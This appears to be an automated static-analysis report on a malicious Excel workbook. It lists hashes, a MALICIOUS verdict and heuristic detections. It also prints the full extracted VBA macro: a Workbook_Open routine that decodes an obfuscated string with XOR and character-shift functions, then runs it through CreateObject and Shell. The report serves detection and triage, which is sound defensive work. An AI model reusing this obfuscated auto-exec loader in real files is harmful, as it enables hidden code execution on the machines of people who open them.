Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 4fd1a80c550195c9…

Verdict: MALICIOUS
File type: Office (OOXML)
Size: 100.6 KB
Created: 2020-02-13 22:02:14 UTC
Authoring application: Microsoft Excel 16.0300
First seen: 2020-07-24
MD5: 2b692512bc2f32f8956a73675e035e96
SHA-1: 2d7471c9872f7be188d84358a6ef7a3239769305
SHA-256: 4fd1a80c550195c9b5887e1044a8b9896c74efac326c540ea9c29bf4977d7fb4
Risk score: 320

Heuristics (7)

  • VBA project inside OOXML (severity: medium; 6 related findings; rule: OOXML_VBA)
    Document contains a VBA project — VBA macros present
  • Shell() call in VBA (severity: critical; rule: OLE_VBA_SHELL)
    Shell() call in VBA
  • VBA character-shift decoded Shell command (severity: critical; rule: OLE_VBA_ASC_CHR_SHIFT_SHELL)
    VBA auto-exec macro stores an encoded command string, decodes it with a Mid/Asc/Chr character-shift loop, and passes the recovered text to Shell. This is a high-confidence command stager.
  • Obfuscated auto-exec VBA loader (severity: critical; rule: OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER)
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • Workbook_Open macro (severity: high; rule: OLE_VBA_WBOPEN)
    Workbook_Open macro
  • CreateObject call (severity: high; rule: OLE_VBA_CREATEOBJ)
    CreateObject call
  • VBA p-code auto-exec with execution tokens (severity: high; rule: OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Artifact 1
Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 2993 bytes
SHA-256: c823f4d04ca09b808c3976aa3efb02a853f5599ed5568130f5b605d38e13efb6
Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
Set xc = CreateObject(baba("KLLK", (DC("3D5H4:5;475E5H873H464G4942"))))
Dim uXCJFXspubIBNgsYICJXGlYCNJFXTMDHJmfZMaFWiCHKIxOXCwplfte As String
Dim JzVwRmUWCsBNvBShCRHKEeiuluCpsXRxQdWvMeoENBZnHFoWkOHoXDZ As String
Dim QuGrYcxPqYfGAwzAuQzooLHAWBLCOIXPtQRWlZQWcarvnjyLezOTfZz As String
Dim FIbVWmuBhWQiFedkUAxMOohMnYztjuYEpQhjeZOkhtJZXVsBAkOThMF As String
QuGrYcxPqYfGAwzAuQzooLHAWBLCOIXPtQRWlZQWcarvnjyLezOTfZz = baba("LK", DC("5D455E4;5;5H454;4942874;554;8D834G564G4H5G5:4445475E4642444H548E4;575D4F5:5H8D833E8E2547355;3:2;3C5;3E2H245:5:5E422D343;433642423428275G27243F5G3C254G22443C3:292343235G242;3H5E5H4F484C462C4:2728242H4:4H4;478E884H4643484F474:8D86474;5E83464G434;4:5:8D3H545H5H4;4884274;5H843E4;4;2H49474G445H87872:465D4742464F4H2C44424G868E465H5:5D9886854E45464:8846465H5H84465G4E855D475G855;4F495E45352:9E9;9;874;554;8E828H4;475C933:4G435D898E32474;5E4C44424G842G564G8D849985244G5D88254;484G4H5H8E884H46438D3H454;4942872F5D5E49474:4F5H47464484843:464G42492;55365G3H2G3F5G3D2:275H5H5D492E373G483549493723245;24273C5;3F264;29473F3H222848285;272G3:5D5:4C434F452F4H2423272:4G4H5G5:4G868H4;475C933:4G435D898E32474;5E4C44424G842G564G8D84"))
JzVwRmUWCsBNvBShCRHKEeiuluCpsXRxQdWvMeoENBZnHFoWkOHoXDZ = Replace(QuGrYcxPqYfGAwzAuQzooLHAWBLCOIXPtQRWlZQWcarvnjyLezOTfZz, "XuSEQuWCItspkGYUjXklYJNrNNVrQOeLiVSKJmJrIETptamfoFcIMND", "")
FIbVWmuBhWQiFedkUAxMOohMnYztjuYEpQhjeZOkhtJZXVsBAkOThMF = JzVwRmUWCsBNvBShCRHKEeiuluCpsXRxQdWvMeoENBZnHFoWkOHoXDZ
Shell (FIbVWmuBhWQiFedkUAxMOohMnYztjuYEpQhjeZOkhtJZXVsBAkOThMF)
End Sub
Public Function baba(fine As String, job As String) As String
        Dim lonDataPtr As Long
        Dim vbc As String
        Dim intXOrValue1 As Integer
        Dim intXOrValue2 As Integer
        For lonDataPtr = 1 To (Len(job) / 2)
            intXOrValue1 = Val("&H" & (Mid$(job, (2 * lonDataPtr) - 1, 2)))
            intXOrValue2 = Asc(Mid$(fine, ((lonDataPtr Mod Len(fine)) + 1), 1))
            vbc = vbc + Chr(intXOrValue1 Xor intXOrValue2)
        Next lonDataPtr
        baba = vbc
    End Function
    Public Function DC(ahmethakay As String)
    Dim alcakmisin As Integer, delimisin As Integer
    alcakmisin = 2
    For delimisin = 1 To Len(ahmethakay)
        Mid(ahmethakay, delimisin, 1) = Chr(Asc(Mid(ahmethakay, delimisin, 1)) - alcakmisin)
    Next delimisin
    DC = ahmethakay
End Function

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Artifact 2
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: xl/vbaProject.bin
Size: 16384 bytes
SHA-256: b60e51bbd67635c98cc53674872a554951c0881f87d0944bd411fbe5493aaefb